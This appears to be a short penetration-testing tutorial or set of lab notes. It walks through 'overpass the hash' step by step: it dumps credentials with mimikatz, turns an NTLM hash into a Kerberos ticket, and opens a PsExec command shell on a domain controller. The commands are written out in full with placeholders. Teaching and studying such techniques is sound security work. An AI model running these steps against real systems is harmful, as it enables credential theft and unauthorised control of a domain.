# Overpass the hash

## Overpass the hash

With overpass the hash, we “over”-abuse an NTLM user hash to obtain a full Kerberos Ticket Granting Ticket (TGT) or service ticket, which grants us access to another machine or service as that user.

1. Transfer all three mimikatz files to the target and run `mimikatz.exe`.
2. Obtain debug privilege: `privilege::debug`
3. `sekurlsa::logonpasswords` (skip this step if you already have the hash).
4. `sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash> /run:PowerShell.exe` At this point we have a new PowerShell session that allows us to execute commands as `<user>`.
5. `exit` mimikatz.
6. `klist` No Kerberos tickets have been cached yet, but this is expected since `<user>` has not performed an interactive login.
7. `net use \\<dc_machine_name>` Generate a TGT by authenticating to a network share on the **domain controller** **or another service** with `net use`.
8. `klist` (the TGT should now be listed).

*We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tool that relies on Kerberos authentication (as opposed to NTLM), such as the official PsExec application from Microsoft.*

9. `.\PsExec.exe \\<dc_machine_name> cmd.exe`
10. `ipconfig` to confirm the shell is running on the domain controller.

*We have successfully reused the Kerberos TGT to launch a command shell on the domain controller.*
